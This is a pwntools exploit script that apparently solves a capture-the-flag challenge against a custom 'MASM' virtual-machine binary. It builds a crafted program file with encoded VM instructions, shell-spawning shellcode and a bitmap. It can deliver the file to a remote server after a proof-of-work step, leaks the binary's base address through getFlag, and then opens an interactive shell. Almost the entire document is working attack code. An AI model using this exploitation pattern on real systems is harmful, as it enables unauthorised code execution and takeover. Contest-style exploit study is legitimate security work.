#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

# Target binary; registering it on `context` makes pwntools pick up its
# arch/endianness for p64/u64/asm below.
e = ELF("debug")
context.binary = e
# pwntools' resolved libc for the target (not referenced elsewhere in this script).
libc = e.libc
# Extra gdb commands passed to gdb.debug(); `ida_connect` presumably comes
# from a gdb plugin/IDA bridge — confirm in your gdb setup.
gs = "\nida_connect\n"


def start():
    """Launch the target and return the pwntools tube connected to it.

    The mode is chosen by pwntools "magic" uppercase arguments, checked in
    this order:
      LOCAL  -- run the binary locally with ``inp.masm`` as its argument.
      GDB    -- same, but under gdb with the ``gs`` script.
      REMOTE -- ``python x.py REMOTE <host> <port>``: connect, run the
                proof-of-work solver command the server prints, then upload
                ``inp.masm`` (size line followed by the raw bytes).
    With no mode flag the binary is run locally (previously this fell
    through and raised UnboundLocalError on ``return p``).
    """
    if args.LOCAL:
        p = e.process(["inp.masm"])
    elif args.GDB:
        p = gdb.debug([e.path, "inp.masm"], gdbscript=gs)
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        import subprocess

        # pwntools removes the magic REMOTE token from sys.argv, so the
        # remaining positional arguments are host and port.
        host, port = sys.argv[1:3]
        p = remote(host, int(port))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode().strip()
        log.info(cmd)
        # SECURITY: this executes a command chosen by the remote server.
        # Passing it as a single argv element avoids the quoting breakage of
        # bash -c '{cmd}', but does not make running it any safer — inspect
        # the logged command. check_output raises if the solver fails
        # instead of silently sending an empty answer.
        ans = subprocess.check_output(["bash", "-c", cmd], text=True)
        # Strip the solver's trailing newline: sendlineafter adds its own,
        # and an extra empty line could be read as the next answer.
        p.sendlineafter(b'Solution? ', ans.strip().encode())
        with open("inp.masm", "rb") as fh:
            data = fh.read()
        p.sendlineafter(b"How big is your program? ", str(len(data)).encode())
        p.send(data)
    else:
        p = e.process(["inp.masm"])
    return p


rip = 0x1000  # initial VM instruction pointer; set_page3_bit indexes relative to 0x1000


def set_page3_bit(page3, rip, should_be_set):
    """Write the flag for the instruction at ``rip`` into the bitmap ``page3``.

    Mirrors the target's index computation ("same logic as in C"): the byte
    index is ``(rip - 4096) / 8`` with C-style signed (truncating) division,
    and the bit inside that byte is ``rip & 7``.

    Args:
        page3: mutable byte buffer (a ``bytearray`` in this script), modified
            in place.
        rip: instruction-pointer value whose bit is written.
        should_be_set: truthy to set the bit, falsy to clear it.

    An out-of-range byte index prints a warning and leaves ``page3`` unchanged.
    """
    # rip - 4089 == (rip - 4096) + 7: biasing negative offsets by 7 before the
    # arithmetic shift makes it round toward zero, as C signed division does.
    offset = rip - 4096 if rip >= 4096 else rip - 4089
    byte_idx = offset >> 3
    mask = 1 << (rip & 7)

    if byte_idx < 0 or byte_idx >= len(page3):
        print(f"Warning: v2 >> 3 = {byte_idx} out of bounds")
        return

    current = page3[byte_idx]
    page3[byte_idx] = (current | mask) if should_be_set else (current & ~mask)


# Build the input program "inp.masm":
#   b"MASM" magic
#   3 segment headers, 5 bytes each: p8(id) + p16(file offset) + p16(length)
#   segment 1: encoded VM instructions (from `instructions`)
#   segment 2: shellcode (shellcraft.sh())
#   segment 3: 0x1000-byte bitmap, one bit per rip value (see set_page3_bit)

# Each entry is [flag, encoded instruction]; `flag` is written into the
# segment-3 bitmap at the rip where that instruction starts.
instructions = [
    [0, p8(0x10)+p32(6)],  # push 6
    [0, p8(0xa0)+p32(0)],  # call allocNewSegment(0)
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffef88)],  # Change data -> page2
    [1, p8(0x21)+p8(1 << 4)+p32(2)],  # syscall 2
    [1, p8(0x21)+p8(2 << 4)+p32(0xa000)],
    [1, p8(0x21)+p8(3 << 4)+p32(0x8)],
    [1, p8(1)],  # print
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffffd8)],
    [1, p8(1)],
    [1, p8(0x21)+p8(5 << 4)+p32(0x28)],
    [1, p8(0x21)+p8(1 << 4)+p32(0xffffffff)],  # syscall 1
    [1, p8(1)],  # write
    [0, p8(0x10)+p32(5)],  # push 5
    [0, p8(0xa0)+p32(0)],  # call getFlag
]

segAdata = b"".join(code for _, code in instructions)
segBdata = asm(shellcraft.sh())
segCdata = bytearray(0x1000)

# Record each instruction's flag at the rip it starts on. `rip` is the
# module-level counter and ends up just past the last instruction.
for expected, instr in instructions:
    set_page3_bit(segCdata, rip, expected)
    rip += len(instr)

SEG_HEADER_SIZE = 5  # p8(id) + p16(offset) + p16(length)
DATA_START = len(b"MASM") + 3 * SEG_HEADER_SIZE  # == 19: first byte after the headers

segA = p8(1)+p16(DATA_START)+p16(len(segAdata))
segB = p8(2)+p16(DATA_START+len(segAdata))+p16(len(segBdata))
segC = p8(3)+p16(DATA_START+len(segAdata)+len(segBdata))+p16(len(segCdata))

# Write the whole file at once inside `with`: the handle is always closed,
# and a failure above (e.g. in asm()) no longer leaves a truncated file.
with open("inp.masm", "wb") as f:
    f.write(b"MASM"+segA+segB+segC+segAdata+segBdata+segCdata)

p = start()

# After this banner the script expects two raw 8-byte values, each unpacked
# with u64 (endianness from context.binary).
p.recvuntil(b'[I] executing program\n')
# recvn() blocks for exactly 8 bytes; recv(8) may return fewer on a
# fragmented read, which made u64() raise.
# The leak minus getFlag's ELF offset gives the load base (assumes a PIE
# binary and that this qword is getFlag's runtime address).
e.address = u64(p.recvn(8)) - e.sym.getFlag
log.success(hex(e.address))

# Second qword, named as segment A's runtime address — confirm against the
# program built in `instructions`.
segA_addr = u64(p.recvn(8))

# Reply with segA_addr - 0x1000 (packed as a qword); NOTE(review): document
# what the target does with this value.
p.sendline(p64(segA_addr-0x1000))


p.interactive()
